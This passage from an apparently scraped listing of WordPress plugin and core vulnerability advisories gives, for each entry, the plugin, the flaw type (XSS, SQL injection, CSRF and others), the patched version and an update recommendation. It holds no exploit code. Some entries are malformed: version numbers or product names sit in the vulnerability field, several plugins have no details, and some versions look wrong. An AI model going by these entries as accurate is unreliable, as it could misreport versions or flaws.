Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: PowerPack Lite for Beaver Builder

Vulnerability: No subtitle
Patched Version: 1.2.9.3
Recommended Action: Update to version 1.2.9.3, or a newer patched version

Plugin: Wishlist and Compare for WooCommerce

Vulnerability: Authorization Bypass
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Responsive Lightbox & Gallery

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: WS Form LITE – Drag & Drop Contact Form Builder for WordPress

Vulnerability: CAPTCHA Bypass
Patched Version: 1.9.118
Recommended Action: Update to version 1.9.118, or a newer patched version

Plugin: Keyword Strategy Internal Links

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.20.94
Recommended Action: Update to version 4.20.94, or a newer patched version

Plugin: Variation Swatches for WooCommerce

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Responsive Tabs

Vulnerability: Authenticated (Contributor+) Content Injection
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block Attribute
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Hummingbird Performance – Cache & Page Speed Optimization for Core Web Vitals | Critical CSS | Minify CSS | Defer CSS Javascript | CDN

Vulnerability: Unauthenticated Path Traversal
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Login or Logout Menu Item

Vulnerability: Unauthenticated Settings Update
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.02
Recommended Action: Update to version 1.3.02, or a newer patched version

Plugin: TinyMCE Color Picker

Vulnerability: Missing Authorization
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: RumbleTalk Live Group Chat – HTML5

Vulnerability: Missing Authorization via handleRequest
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Reflected Cross Site Scripting
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Authenticated (Subscriber+) Arbitrary Plugin Installation and Activation
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: Telefication

Vulnerability: Open Relay and Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShiftThis

Plugin: Breezing Forms

Vulnerability: SQL Injection
Patched Version: 1.2.7.31
Recommended Action: Update to version 1.2.7.31, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: Authenticated SQL Injection
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Backup Scheduler

Plugin: Advanced Category Template

Plugin: WPML

Vulnerability: Arbitrary Deletion of Content
Patched Version: 3.1.9.1
Recommended Action: Update to version 3.1.9.1, or a newer patched version

Plugin: Click to top

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Plugmatter Optin Feature Box

Vulnerability: SQL Injection
Patched Version: 2.0.14
Recommended Action: Update to version 2.0.14, or a newer patched version

Plugin: Limit Login Attempts (Spam Protection)

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Microsoft Clarity

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.4
Recommended Action: Update to version 0.4, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: Sell Media

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: Contractor Contact Form Website to Workflow Tool

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Analytics for WP

Plugin: Form – Contact Form

Vulnerability: Administrator+ Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Documentor – Create Product Documentation

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WP Like Button

Vulnerability: Missing Authorization via crublabFBLBAjax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Student Results

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection via ‘event_count’
Patched Version: 7.8.2
Recommended Action: Update to version 7.8.2, or a newer patched version

Core: WordPress

Vulnerability: Remote File Inclusion
Patched Version: 0.71
Recommended Action: Update to version 0.71, or a newer patched version

Plugin: WooCommerce EnvioPack

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 20160215
Recommended Action: Update to version 20160215, or a newer patched version

Plugin: amr shortcode any widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShareThis Dashboard for Google Analytics

Vulnerability: Reflected Cross-Site Scripting via ga_action parameter
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Woocommerce Products Price Bulk Edit

Vulnerability: Cross-Site Scripting via show_products_page_limit parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Service Area Postcode Checker

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1.0.5
Recommended Action: Update to version 3.1.0.5, or a newer patched version

Plugin: FeedWordPress

Vulnerability: SQL Injection
Patched Version: 2015.0514
Recommended Action: Update to version 2015.0514, or a newer patched version

Plugin: Leaflet Maps Marker Pro

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: underConstruction

Vulnerability: Cross-Site Request Forgery to Construction Mode Disabled
Patched Version: 1.20
Recommended Action: Update to version 1.20, or a newer patched version

Plugin: Simple File List

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.12
Recommended Action: Update to version 4.4.12, or a newer patched version

Plugin: NitroPack – Caching & Speed Optimization for Core Web Vitals, Defer CSS & JS, Lazy load Images and CDN

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.3
Recommended Action: Update to version 1.10.3, or a newer patched version

Plugin: Psychological tests & quizzes

Plugin: Tweet Wheel

Vulnerability: Missing Authorization Checks
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Security Audit

Plugin: File Manager

Vulnerability: Arbitrary File Upload/Remote Code Execution
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: WP-Members Membership Plugin

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: Fontsy

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Open Redirect
Patched Version: 1.9.30
Recommended Action: Update to version 1.9.30, or a newer patched version

Plugin: CDN Vote

Vulnerability: SQL Injection
Patched Version: 0.4.2
Recommended Action: Update to version 0.4.2, or a newer patched version

Plugin: Keyword Rank Tracker

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WDS Multisite Aggregate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 4.3.45
Recommended Action: Update to version 4.3.45, or a newer patched version

Plugin: RD Station

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 5.2.1
Recommended Action: Update to version 5.2.1, or a newer patched version

Plugin: mgl-instagram-gallery

Plugin: Free WordPress Lead Generation Opt in, Free Popups, Generated Lead Email Popup, Exit-Intent Popup – NotifyVisitors

Plugin: Elegant Custom Fonts

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Animate It!

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: LionScripts: IP Blocker Lite

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 10.5
Recommended Action: Update to version 10.5, or a newer patched version

Plugin: Online Booking & Scheduling Calendar for WordPress by vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.21.1
Recommended Action: Update to version 4.21.1, or a newer patched version

Plugin: Tag Miner (Automatic Tag Extraction)

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Legal Pages – Privacy Policy, Terms & Conditions, GDPR, CCPA, and Cookie Notice Generator

Vulnerability: Missing Authorization
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Typing Effect

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Conditional Payments for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Website Optimization – Plerdy

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Authenticated (Author+) Remote Code Execution
Patched Version: 7.9.9
Recommended Action: Update to version 7.9.9, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.7.9
Recommended Action: Update to version 4.7.9, or a newer patched version

Plugin: More from Google

Plugin: 10WebAnalytics

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Open Redirect
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Responsive Logo Slideshow

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Ultimate Reviews

Vulnerability: PHP Object Injection
Patched Version: 2.1.33
Recommended Action: Update to version 2.1.33, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Login Page Disclosure via ‘action=confirmaction’
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Contextual Adminbar Color

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Open Redirect
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Advanced Database Cleaner

Vulnerability: SQL injection
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Reflected Cross-Site Scripting via ays_gpg_settings_tab
Patched Version: 5.1.4
Recommended Action: Update to version 5.1.4, or a newer patched version

Plugin: SVGator – Add Animated SVG Easily

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Freshmail for WordPress

Vulnerability: SQL Injection
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: No Follow All External Links

Vulnerability: 2.3.0
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ready! Google Maps

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Link Library

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8.11
Recommended Action: Update to version 5.8.11, or a newer patched version

Plugin: Decorator – WooCommerce Email Customizer

Vulnerability: WooCommerce Email Customizer <= 1.2.7
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Floating Tweets

Plugin: User Meta Manager

Plugin: Photo Engine (Media Organizer & Lightroom)

Vulnerability: Authenticated (Author+) Insecure Direct Object Reference in ajax_generate_auth_token
Patched Version: 6.2.6
Recommended Action: Update to version 6.2.6, or a newer patched version

Plugin: WP Limit Login Attempts

Vulnerability: SQL Injection
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: BP Group Documents

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Grid Gallery – Photo Image Grid Gallery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Shapely Companion

Vulnerability: Unprotected AJAX Action to Content Import
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: Cross-Site Request Forgery to Post Updates
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: 10Web Social Post Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Search Everything

Vulnerability: SQL Injection
Patched Version: 8.1.7
Recommended Action: Update to version 8.1.7, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.11
Recommended Action: Update to version 2.9.11, or a newer patched version

Plugin: Locatoraid Store Locator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.9.15
Recommended Action: Update to version 3.9.15, or a newer patched version

Plugin: EventON

Vulnerability: Missing Authorization to Event Access
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: zeList

Plugin: MF Gig Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.0.14
Recommended Action: Update to version 1.7.0.14, or a newer patched version

Plugin: BuddyPress & BuddyBoss Member Profile Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.22
Recommended Action: Update to version 1.4.22, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 7.0.07
Recommended Action: Update to version 7.0.07, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.19
Recommended Action: Update to version 1.9.19, or a newer patched version

Plugin: WooCommerce Subscription

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Missing Authorization
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Store Toolkit – WooCommerce Extensions, Quick Enhancements & Handy Tools

Vulnerability: Privilege Escalation
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Counter Box: Add Engaging Countdowns, Timers & Counters to Your WordPress Site

Vulnerability: Authenticated Local File Inclusion
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Alphabetic Pagination

Vulnerability: Missing Authorization to Unauthenticated Arbitrary Options Update
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Blazeo

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WP Repost

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: Parcel Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.12
Recommended Action: Update to version 1.6.12, or a newer patched version

Plugin: Contact form 7 Custom validation

Vulnerability: Unauthenticated SQL Injection via ‘post’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery on ajax_move_object
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: video carousel slider with lightbox

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Simple Slug Translate

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scritping
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Attendance Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.5.7
Recommended Action: Update to version 0.5.7, or a newer patched version

Plugin: Bulk edit image alt tag, caption & description – WordPress Media Library Helper by Codexin

Vulnerability: Cross-Site Request Forgery via rate_the_plugin_action
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Real3D Flipbook

Vulnerability: Directory Traversal via Uploads
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Student Result or Employee Database

Vulnerability: Missing Authorization
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: WP Simple Spreadsheet Fetcher for Google

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.3.7
Recommended Action: Update to version 0.3.7, or a newer patched version

Plugin: Simple Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: TI WooCommerce Wishlist

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.40.1
Recommended Action: Update to version 1.40.1, or a newer patched version

Plugin: Twitter Bootstrap Slider

Plugin: Predictive Search for WooCommerce

Vulnerability: Cross-Site Request Forgery via multiple AJAX actions
Patched Version: 5.8.1
Recommended Action: Update to version 5.8.1, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: Woocommerce Follow-ups

Vulnerability: Authenticated (Follow-up emails manager+) SQL Injection
Patched Version: 4.9.51
Recommended Action: Update to version 4.9.51, or a newer patched version

Plugin: Font Awesome 4 Menus

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery to plugin installation
Patched Version: 2.33.4
Recommended Action: Update to version 2.33.4, or a newer patched version

Plugin: Bulk Edit and Create User Profiles – WP Sheet Editor

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.14
Recommended Action: Update to version 1.5.14, or a newer patched version

Plugin: Advanced Popups

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.5.7, 1.6.4, 1.7.4

Plugin: Simple Tooltips

Plugin: dm-albums

Vulnerability: Remote File Inclusion
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Intuitive Custom Post Order

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.13
Recommended Action: Update to version 3.0.13, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Scripting
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: Newsletter by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Feed Statistics

Vulnerability: Open Redirect
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Simple 301 Redirects – Addon – Bulk Uploader

Vulnerability: Missing Authentication on Option Changes
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Yes/No Chart

Vulnerability: Authenticated SQL Injection
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Advanced Custom Fields: Extended

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.8.9.4
Recommended Action: Update to version 0.8.9.4, or a newer patched version

Plugin: Short URL

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Leyka

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure
Patched Version: 3.30.7.1
Recommended Action: Update to version 3.30.7.1, or a newer patched version

Plugin: BuddyPress Xprofile Custom Fields Type

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Privilege Escalation to Arbitrary Post Modification
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: My Content Management

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.20
Recommended Action: Update to version 1.1.20, or a newer patched version

Plugin: Track The Click

Vulnerability: Authenticated (Author+) SQL Injection via ‘stats’ REST Endpoint
Patched Version: 0.3.12
Recommended Action: Update to version 0.3.12, or a newer patched version

Plugin: GTmetrix for WordPress

Vulnerability: Reflected Cross-Site Scripting via ‘url’
Patched Version: 0.4.6
Recommended Action: Update to version 0.4.6, or a newer patched version

Plugin: WP Edit Menu

Vulnerability: Missing Authorization to Post Deletion
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘logPageContent’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Mikiurl WordPress Eklentisi

Plugin: Fluent Support – Helpdesk & Customer Support Ticket System

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Cross-Site Request Forgery leading to Plugin/Subscription Deletion
Patched Version: 6.0.3.0
Recommended Action: Update to version 6.0.3.0, or a newer patched version

Plugin: Easy Digital Downloads – Amazon S3

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Insecure Deserialization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Marketo Forms and Tracking

Plugin: LWS Affiliation

Vulnerability: Missing Authorization Checks
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Missing Authorization to Arbitrary Options Disclosure
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: IP Blacklist Cloud

Plugin: videowall

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Unrestricted File Upload
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Advanced Comment Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Beautiful Cookie Consent Banner

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Denial of Service
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: QuBot – Chatbot Builder with Templates

Vulnerability: Unauthenticated Self-Based Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Bestbooks

Plugin: Internal Link Building

Plugin: Booking Calendar Contact Form

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: Contact Form 7 extension for Google Map fields

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WP Symposium

Vulnerability: Open Redirection
Patched Version: 13.05
Recommended Action: Update to version 13.05, or a newer patched version

Plugin: Page Builder with Image Map by AZEXO

Vulnerability: Missing Authorization to Post Creation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Network Tabs

Vulnerability: Social Media API Key Leakage <= 1.7.1
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: zingiri-web-shop

Vulnerability: Multiple Vulnerabilities
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Missing Authorization to Custom Drop-Down Currency Switcher Creation
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: SlickQuiz

Plugin: Customizer Export/Import

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 0.9.6
Recommended Action: Update to version 0.9.6, or a newer patched version

Plugin: My Page Order

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Builder forms Addon For WordPress < 5.7
Patched Version: 5.7
Recommended Action: Update to version 5.7, or a newer patched version

Plugin: Recipe Cards For Your Food Blog from Zip Recipes

Vulnerability: Reflected Cross-Site Scripting via ‘s’ parameter
Patched Version: 8.0.7
Recommended Action: Update to version 8.0.7, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Open Redirect
Patched Version: 4.8.5
Recommended Action: Update to version 4.8.5, or a newer patched version

Plugin: AB Press Optimizer

Plugin: WP Hotel Booking

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.10.2
Recommended Action: Update to version 1.10.2, or a newer patched version

Plugin: WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.38
Recommended Action: Update to version 3.1.38, or a newer patched version

Plugin: Email Template Designer – WP HTML Mail

Vulnerability: Cross-Site Request Forgery via ‘send_test’
